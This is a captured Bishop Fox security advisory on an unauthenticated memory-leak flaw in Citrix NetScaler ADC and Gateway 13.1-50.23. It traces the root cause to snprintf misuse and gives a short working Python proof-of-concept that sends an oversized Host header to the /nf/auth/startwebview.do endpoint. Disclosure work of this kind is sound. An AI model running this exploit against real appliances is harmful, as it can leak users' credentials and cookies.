bishopfox.com Open in urlscan Pro
2606:4700:20::6818:362  Public Scan

URL: https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory
Submission: On May 07 via api from TR — Scanned from DE

Form analysis 2 forms found in the DOM

<form id="mktoForm_1049" __bizdiag="196351718" __biza="W___" novalidate="novalidate" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;" class="mktoForm mktoHasWidth mktoLayoutLeft" digitalpi-utms-added="true">
  <style type="text/css"></style>
  <div class="mktoFormRow">
    <div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
      <div class="mktoOffset" style="width: 5px;"></div>
      <div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
          <div class="mktoAsterix">*</div>Email Address:
        </label>
        <div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email" class="mktoField mktoEmailField mktoHasWidth mktoRequired"
          aria-required="true" style="width: 320px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
        <div class="mktoClear"></div>
      </div>
      <div class="mktoClear"></div>
    </div>
    <div class="mktoClear"></div>
  </div>
  <div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
    value="1049"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="136-UTJ-516"><input type="hidden" name="Utm_Orig_Medium__c" class="mktoField mktoFieldDescriptor" value="none"><input type="hidden"
    name="Utm_Orig_Source__c" class="mktoField mktoFieldDescriptor" value="none">
</form>

<form __bizdiag="-156876159" __biza="W___" novalidate="novalidate" style="font-family: inherit; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"
  class="mktoForm mktoHasWidth mktoLayoutLeft"></form>

Text Content

Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management.
Read the Report ›

Cosmos
Services
Resources
Customers
Partners
About Us
Get Started

Introducing Cosmos


NAMED LEADER OF THE GIGAOM RADAR FOR THE THIRD YEAR IN A ROW!

Request A Demo
Cosmos Overview


Meet Cosmos: The continuous offensive security solution designed to provide
proactive defense.

Cosmos Attack Surface Management


Get Cosmos Attack Surface Management (CASM) for unmatched visibility into your
changing external attack surface with continuous discovery and mapping.

Cosmos Application Penetration Testing


Cosmos Application Penetration Testing (CAPT) strengthens the security of
business-critical applications with in-depth assessments.

Cosmos External Penetration Testing


Cosmos External Penetration Testing (CEPT) builds on Cosmos Attack Surface
Management to provide the highest level of attack surface protection with
post-exploitation activities.

The Best Defense is a Great Offense


SEE WHY WE'RE THE LEADERS IN OFFENSIVE SECURITY

Explore Services
Application Security


Ensure your applications are secure and improve your DevSecOps practices.

 * Application Pen Testing
 * Hybrid App Assessment
 * Mobile App Assessment
 * View More

Red Team & Readiness


Get a holistic view of your ability to defend against a real-world attack.

 * Social Engineering
 * Incident Response Tabletop Exercise
 * Ransomware Readiness

IoT & Product Security


Validate interconnected devices and products are secure against attackers.

Cloud Security


Assess cloud security posture with expert testing and analysis of your
environment.

Network Security


Get insight into how skilled adversaries could establish network access and put
sensitive systems and data at risk.

 * External Pen Testing
 * Internal Pen Testing
 * Continuous Attack Surface Testing

AI/ML Security Assessment


Fortify the security of rapidly evolving AI/ML applications, models, and
supporting infrastructures.

Compliance, Regulations, & Frameworks


Satisfy governance, risk, and compliance programs with our testing services.

Assessments for Our Partners


We're proud to work with Google, Facebook, and Amazon to increase security in
their partner ecosystems.

 * Cloud App Security Assessments (CASA)
 * Meta Workplace Assessments
 * Amazon Alexa Assessments
 * View More

A Ponemon Institute Report


THE STATE OF OFFENSIVE SECURITY

Get the blueprint. Insights into how mature security organizations invest in
offensive strategies.

Get the Report
Resource Center


Discover new offensive security resources, ranging from reports and eBooks to
slide decks from speaking gigs.

 * Webcasts
 * Reports
 * eBooks & Guides
 * Cybersecurity Style Guide
 * View All

Bulletins & Advisories


Explore the latest security bulletins and advisories released by our team.

 * Exploit for Fortinet CVE-2022-42475
   Latest
 * View All

Blog


Dive into our blog for insights and perspectives from our offensive security
experts.

 * Industry
 * Technology

Bishop Fox Labs


Learn more about our research and some of the most popular open-source security
tools. Check them out here!

 * Hacking Tools
 * Training Sessions



Why Partner with Us?


JOIN FORCES WITH THE LEADERS IN OFFENSIVE SECURITY

Independent Assessment by TAG Cyber

Get the Report
Partner Program Overview


Learn about our partner programs and see how we can work together to provide
best-in-class security offerings.

Find a Partner


Check out our awesome ecosystem of trusted partners to find the right solution
for your needs.

Become a Partner


Explore partnership opportunities and apply to join forces with Bishop Fox.

Assessments for Our Partners


We're proud to work with Google, Facebook, and Amazon to increase the security
of their partner ecosystems.

 * Cloud Application Security Assessments
 * Mobile Application Security Assessment
 * Nest Assessments
 * Meta Workplace Assessments
 * Amazon Alexa Assessments

We're Hiring!


WANT TO WORK WITH THE BEST MINDS IN OFFENSIVE SECURITY?

Be part of an elite team and work on projects that have a real impact.

Explore Openings
Company Overview


Get to know us. Learn about our roots and see why we're on a mission to improve
security for all.

Events


Join us at an upcoming event or peruse our speaking engagements, past and
present.

Newsroom


Read the latest articles, announcements, and press releases from Bishop Fox.

Contact Us


Want to get in touch? We're ready to connect.

Career Opportunities


We're hiring! Explore our open positions and discover why the Fox Den is a great
place to build your career.

Intern & Educational Programs


Starting your offensive security journey? Check out our internships and
educational programs.

Bishop Fox Mexico


¡Celebramos! Bishop Fox is now in Mexico. Learn more about our expansion.


Cosmos
 * Overview
 * Cosmos Overview
 * Cosmos Attack Surface Management
 * Cosmos Application Penetration Testing
 * Cosmos External Penetration Testing

Services
 * Overview
 * Application Security
 * Red Team & Readiness
 * IoT & Product Security
 * Cloud Security
 * Network Security
 * AI/ML Security Assessment
 * Compliance, Regulations, & Frameworks
 * Assessments for Our Partners

Resources
 * Overview
 * Resource Center
 * Bulletins & Advisories
 * Blog
 * Bishop Fox Labs

Customers
Partners
 * Overview
 * Partner Program Overview
 * Find a Partner
 * Become a Partner
 * Assessments for Our Partners

About Us
 * Overview
 * Company Overview
 * Events
 * Newsroom
 * Contact Us
 * Career Opportunities
 * Intern & Educational Programs
 * Bishop Fox Mexico

Get Started
Blog // Advisories // May 06, 2024


NETSCALER ADC AND GATEWAY, VERSION 13.1-50.23

By: Bishop Fox, Security Experts


Share




PRODUCT VENDOR

Cloud Software Group


PRODUCT DESCRIPTION

The affected Citrix NetScaler components are used for Authentication,
Authorization, and Auditing (AAA), and remote access. The latest version of
NetScaler is 14.1-21.15, released on April 23, 2024.


VULNERABILITIES LIST

One vulnerability was identified within Citrix Netscaler ADC and Gateway:

 * Out-Of-Bounds Memory Read

These vulnerabilities are described in the following sections.


AFFECTED VERSION

Version 13.1-50.23


SUMMARY OF FINDINGS

The vulnerability would enable an attacker to remotely obtain sensitive
information from a NetScaler appliance configured as a Gateway or AAA virtual
server via a very commonly connected Web interface, and without requiring
authentication. This bug is nearly identical to the Citrix Bleed vulnerability
(CVE-2023-4966), except it is less likely to return highly sensitive information
to an attacker.


IMPACT

The vulnerability allows an attacker to recover potentially sensitive data from
memory. Although in most cases nothing of value is returned, we have observed
instances where POST request bodies are leaked. These POST requests may contain
credentials or cookies.


SOLUTION

Update to version 13.1-51.15 or later


OUT-OF-BOUNDS MEMORY READ

Netscaler ADC and Gateway products were vulnerable to an unauthenticated
out-of-bounds memory read which could be exploited to capture sensitive
information from the appliances process memory, including HTTP request bodies.


VULNERABILITY DETAILS

CVE ID: None

Vulnerability Type: Out-Of-Bounds Read

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if
other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒
Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-125 (Out-Of-Bounds Read)

Bishop Fox staff determined that NetScaler ADC and Gateway products were
vulnerable to an unauthenticated out-of-bounds memory read and exploited the
vulnerability to capture sensitive information from the appliance’s process
memory, including HTTP request bodies. This could potentially allow attackers to
obtain credentials submitted by users logging in to NetScaler ADC and Gateway
appliances, or cryptographic material used by the appliance.

Bishop Fox staff determined that the Gateway or AAA virtual server performs
unsafe handling of the HTTP Host request header when handling HTTP GET requests
for the /nf/auth/startwebview.do URI. The vulnerable function attempts to
calculate the length of a string containing the Host header and then direct a
subsequent function to copy a string of that length to an HTTP response message.
However, incorrect use of the C snprintf method results in the length exceeding
the size of the source buffer and causing unrelated data to be copied to the
response if the Host header value submitted in the request is longer than
approximately 5,394 bytes. Authentication is not required to exploit this
vulnerability.

The following Python proof-of-concept code can be used to demonstrate
exploitability when executed against a vulnerable appliance:

import requests
url = "https://<HOST>/nf/auth/startwebview.do" 

r = requests.get(url, headers={"Host":"A"*0x5000}, verify=False) 

print(r.content[0x1800:]) 

Figure 1 – Proof-of-concept exploit code

More specifically, requests to the /nf/auth/startwebview.do URI are handled by
the ns_aaa_start_webview_for_authv3 function. The
ns_aaa_start_webview_for_authv3 function constructs an XML response using the
snprintf function and returns this response to the user by calling the
ns_vpn_send_response function, as shown below:

sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr,
  "/nf/auth/doWebview.do");
length = snprintf(&ns_HttpRedirectPkt,0x1800,
  "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><AuthenticateRespo nse xmlns=\"http://citrix.com/authentication/response/1\"><Status>success</Statu s><Result>more-info</Result><StateContext></StateContext><AuthenticationRequirem ents><PostBack>/nf/auth/webview/done</PostBack><CancelPostBack>/nf/auth/doLogoff .do</CancelPostBack><CancelButtonText>Cancel</CancelButtonText><Requirements><Re quirement><Credential><ID>samlResponse</ID><Type>webview</Type><wv:WebView xmlns :wv=\"http://citrix.com/authentication/response/webview/1\"><wv:StartUrl>%.*s</w v:StartUrl></wv:WebView></Credential><Label><Type>none</Type></Label><Input/></R equirement></Requirements></AuthenticationRequirements></AuthenticateResponse>"
  ,length,print_temp_rule);
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);

Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function

The ns_vpn_send_response function sends an HTTP response where the body and size
of the body are provided as parameters. In the code shown above, the size is set
to the return value from the snprintf function. According to the documentation
for the snprintf function, the return value is the number of characters that
would have been written if enough space had been available. Therefore, if the
constructed response would have exceeded the buffer size (0x1800 bytes in this
case), the ns_vpn_send_response function will respond with extra data past the
end of the buffer. This is identical to the underlying cause of CVE-2023-4966
(CitrixBleed).

The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3
function is discussed in more detail in the Insecure String Handling finding of
this report.

Bishop Fox staff analyzed vulnerable Citrix deployments and observed instances
where the disclosed memory contained data from HTTP requests, sometimes
including POST request bodies. For example, the response below includes data
from another HTTP request processed by the appliance, apparently related to a
Nessus vulnerability scan:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <AuthenticateResponse xmlns="http://citrix.com/authentication/response/1">
    <Status>success</Status>
    <Result>more-info</Result>
    <StateContext></StateContext>
    <AuthenticationRequirements>
      <PostBack>/nf/auth/webview/done</PostBack>
      <CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack>
      <CancelButtonText>Cancel</CancelButtonText>
      <Requirements>
        <Requirement>
          <Credential>
          <ID>samlResponse</ID>
          <Type>webview</Type>
          <wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1">
          <wv:StartUrl>https://  ...omitted for brevity...

Figure 3 – NetScaler appliance response disclosing memory content

HTTP requests often contain sensitive information that could benefit an
attacker, such as administrators’ credentials.


AFFECTED LOCATIONS

URI

/nf/auth/startwebview.do

Function

ns_aaa_start_webview_for_authv3 in /netscaler/nsppe


CREDITS

 * Capability Development Group at Bishop Fox


TIMELINE

 * 01/22/2024: Initial discovery
 * 01/25/2024: Contact with vendor
 * 02/01/2024: Vendor acknowledged vulnerabilities
 * 02/02/2024: Vendor confirmed that the latest version (13.1-51.15) was
   unaffected
 * 05/06/2024: Vulnerabilities publicly disclosed

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.

*
Email Address:




Submit

Thank You! You have been subscribed.

--------------------------------------------------------------------------------

About the author, Bishop Fox

Security Experts

Due to the nature in which we conduct research and penetration tests, some of
our security experts prefer to rename anonymous. Their work is published under
our Bishop Fox name.

Bishop Fox is the leading authority in offensive security, providing solutions
ranging from continuous penetration testing, red teaming, and attack surface
management to product, cloud, and application security assessments. We’ve worked
with more than 25% of the Fortune 100, half of the Fortune 10, eight of the top
10 global technology companies, and all of the top global media companies to
improve their security. Our Cosmos platform, service innovation, and culture of
excellence continue to gather accolades from industry award programs including
Fast Company, Inc., SC Media, and others, and our offerings are consistently
ranked as “world class” in customer experience surveys. We’ve been actively
contributing to and supporting the security community for almost two decades and
have published more than 16 open-source tools and 50 security advisories in the
last five years. Learn more at bishopfox.com or follow us on Twitter.

More by Bishop




RECOMMENDED POSTS


YOU MIGHT BE INTERESTED IN THESE RELATED POSTS.

Nov 27, 2023

Ray, Versions 2.6.3, 2.8.0



Jun 20, 2023

TaskCafe, Version 0.3.2 Advisory



Apr 13, 2023

WP Coder, Version 2.5.3 Advisory



Apr 04, 2023

Microsoft Intune, Version 1.55.48.0 Advisory

 * Cosmos Platform
 * Cosmos Attack Surface Management
 * Cosmos Application Penetration Testing
 * Cosmos External Penetration Testing

 * Services
 * Application Security
 * Cloud Security
 * IoT & Product Security
 * Network Security
 * Red Team & Readiness
 * Compliance, Regulations, & Frameworks
 * Google, Facebook, & Amazon Partner Assessments

 * Resources
 * Resource Center
 * Blog
 * Advisories
 * Tools

 * Our Customers
 * Our Customer Stories

 * Partners
 * Partner Programs
 * Partner Directory
 * Become a Partner

 * Company
 * About Us
 * Careers
   We're Hiring
 * Events
 * Newsroom
 * Bishop Fox Mexico
 * Bishop Fox Labs
 * Contact Us



Copyright © 2024 Bishop Fox

Privacy Statement Responsible Disclosure Policy

This site uses cookies to provide you with a great user experience. By
continuing to use our website, you consent to the use of cookies. To find out
more about the cookies we use, please see our Privacy Policy.

Accept




Live Chat